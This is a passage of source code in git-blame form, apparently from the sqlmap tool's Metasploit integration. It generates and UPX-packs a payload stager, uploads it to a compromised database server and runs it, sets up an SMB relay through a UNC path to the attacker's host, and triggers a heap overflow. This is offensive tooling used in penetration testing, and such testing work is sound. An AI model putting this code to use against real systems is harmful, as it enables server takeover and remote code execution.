# This is useful for sqlmap because on PostgreSQL it is not
|
|
|
|
# possible to write files bigger than 8192 bytes abusing the
|
|
|
|
# lo_export() feature implemented in sqlmap.
|
|
|
|
if kb.dbms == "PostgreSQL":
|
|
|
|
self.__fileFormat = "exe-small"
|
|
|
|
else:
|
|
|
|
self.__fileFormat = "exe"
|
2009-04-22 15:48:07 +04:00
|
|
|
else:
|
2010-02-26 16:13:50 +03:00
|
|
|
self.exeFilePathLocal = os.path.join(conf.outputPath, "tmpm%s" % self.__randStr)
|
2009-05-11 19:37:48 +04:00
|
|
|
self.__fileFormat = "elf"
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
if initialize:
|
2009-04-22 15:48:07 +04:00
|
|
|
self.__initVars()
|
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
if self.payloadStr is None:
|
2009-04-22 15:48:07 +04:00
|
|
|
self.__prepareIngredients()
|
|
|
|
|
2009-05-11 19:37:48 +04:00
|
|
|
self.__forgeMsfPayloadCmd("process", self.__fileFormat, self.exeFilePathLocal)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
logger.debug("executing local command: %s" % self.__payloadCmd)
|
2009-05-11 19:37:48 +04:00
|
|
|
process = execute(self.__payloadCmd, shell=True, stdout=None, stderr=PIPE)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X"))
|
|
|
|
pollProcess(process)
|
|
|
|
payloadStderr = process.communicate()[1]
|
|
|
|
|
|
|
|
if kb.os == "Windows":
|
2009-12-18 01:04:01 +03:00
|
|
|
payloadSize = re.search("size\s([\d]+)", payloadStderr, re.I)
|
2009-04-22 15:48:07 +04:00
|
|
|
else:
|
|
|
|
payloadSize = re.search("Length\:\s([\d]+)", payloadStderr, re.I)
|
|
|
|
|
|
|
|
os.chmod(self.exeFilePathLocal, stat.S_IRWXU)
|
|
|
|
|
|
|
|
if payloadSize:
|
|
|
|
payloadSize = payloadSize.group(1)
|
|
|
|
exeSize = os.path.getsize(self.exeFilePathLocal)
|
2009-12-18 01:04:01 +03:00
|
|
|
|
2010-02-20 22:02:55 +03:00
|
|
|
# Only pack the payload stager if the back-end DBMS operating
|
|
|
|
# system is Windows and new portable executable template is
|
|
|
|
# used
|
|
|
|
if self.__fileFormat == "exe":
|
2009-12-18 01:04:01 +03:00
|
|
|
packedSize = upx.pack(self.exeFilePathLocal)
|
|
|
|
else:
|
|
|
|
packedSize = None
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
debugMsg = "the encoded payload size is %s bytes, " % payloadSize
|
|
|
|
|
2009-12-18 01:04:01 +03:00
|
|
|
if packedSize and packedSize < exeSize:
|
2009-04-22 15:48:07 +04:00
|
|
|
debugMsg += "as a compressed portable executable its size "
|
|
|
|
debugMsg += "is %d bytes, decompressed it " % packedSize
|
|
|
|
debugMsg += "was %s bytes large" % exeSize
|
|
|
|
else:
|
|
|
|
debugMsg += "as a portable executable its size is "
|
|
|
|
debugMsg += "%s bytes" % exeSize
|
|
|
|
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
else:
|
2009-04-24 00:39:32 +04:00
|
|
|
errMsg = "failed to create the payload stager (%s)" % payloadStderr
|
|
|
|
raise sqlmapFilePathException, errMsg
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-01-14 17:03:16 +03:00
|
|
|
def uploadMsfPayloadStager(self, web=False):
|
|
|
|
if web:
|
2010-01-14 23:42:45 +03:00
|
|
|
self.exeFilePathRemote = "%s/%s" % (self.webDirectory, os.path.basename(self.exeFilePathLocal))
|
2010-01-14 17:03:16 +03:00
|
|
|
else:
|
|
|
|
self.exeFilePathRemote = "%s/%s" % (conf.tmpPath, os.path.basename(self.exeFilePathLocal))
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2010-04-23 20:34:20 +04:00
|
|
|
self.exeFilePathRemote = ntToPosixSlashes(normalizePath(self.exeFilePathRemote))
|
2010-01-28 20:07:34 +03:00
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
logger.info("uploading payload stager to '%s'" % self.exeFilePathRemote)
|
2010-01-14 17:03:16 +03:00
|
|
|
|
|
|
|
if web:
|
2010-01-14 23:42:45 +03:00
|
|
|
self.webFileUpload(self.exeFilePathLocal, self.exeFilePathRemote, self.webDirectory)
|
2010-01-14 17:03:16 +03:00
|
|
|
else:
|
|
|
|
self.writeFile(self.exeFilePathLocal, self.exeFilePathRemote, "binary", False)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
os.unlink(self.exeFilePathLocal)
|
|
|
|
|
2009-09-26 03:03:45 +04:00
|
|
|
def pwn(self, goUdf=False):
|
2010-01-02 05:02:12 +03:00
|
|
|
if goUdf:
|
2009-09-26 03:03:45 +04:00
|
|
|
exitfunc = "thread"
|
|
|
|
func = self.__runMsfShellcodeRemote
|
|
|
|
else:
|
|
|
|
exitfunc = "process"
|
|
|
|
func = self.__runMsfPayloadRemote
|
|
|
|
|
|
|
|
self.__runMsfCli(exitfunc=exitfunc)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
if self.connectionStr.startswith("bind"):
|
2009-09-26 03:03:45 +04:00
|
|
|
func()
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
debugMsg = "Metasploit Framework 3 command line interface exited "
|
2009-09-26 03:03:45 +04:00
|
|
|
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, func)
|
2009-04-22 15:48:07 +04:00
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
2010-01-02 05:02:12 +03:00
|
|
|
if not goUdf:
|
2009-12-18 01:04:01 +03:00
|
|
|
self.delRemoteFile(self.exeFilePathRemote, doubleslash=True)
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
def smb(self):
|
|
|
|
self.__initVars()
|
2010-02-26 16:13:50 +03:00
|
|
|
self.__randFile = "tmpu%s.txt" % randomStr(lowercase=True)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
2009-04-24 14:27:52 +04:00
|
|
|
self.__forgeMsfConsoleResource()
|
|
|
|
self.__forgeMsfConsoleCmd()
|
|
|
|
|
2009-04-22 15:48:07 +04:00
|
|
|
if kb.dbms in ( "MySQL", "PostgreSQL" ):
|
2009-04-24 14:27:52 +04:00
|
|
|
self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self.__randFile)
|
2009-04-22 15:48:07 +04:00
|
|
|
else:
|
2009-04-24 14:27:52 +04:00
|
|
|
self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self.__randFile)
|
2009-04-22 15:48:07 +04:00
|
|
|
|
|
|
|
self.__runMsfConsole()
|
|
|
|
|
|
|
|
debugMsg = "Metasploit Framework 3 console exited with return "
|
|
|
|
debugMsg += "code %s" % self.__controlMsfCmd(self.__msfConsoleProc, self.uncPathRequest)
|
|
|
|
logger.debug(debugMsg)
|
|
|
|
|
|
|
|
os.unlink(self.resourceFile)
|
|
|
|
|
|
|
|
def bof(self):
|
|
|
|
self.__runMsfCli(exitfunc="seh")
|
|
|
|
|
|
|
|
if self.connectionStr.startswith("bind"):
|
|
|
|
self.spHeapOverflow()
|
|
|
|
|
|
|
|
debugMsg = "Metasploit Framework 3 command line interface exited "
|
|
|
|
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, self.spHeapOverflow)
|
|
|
|
logger.debug(debugMsg)
|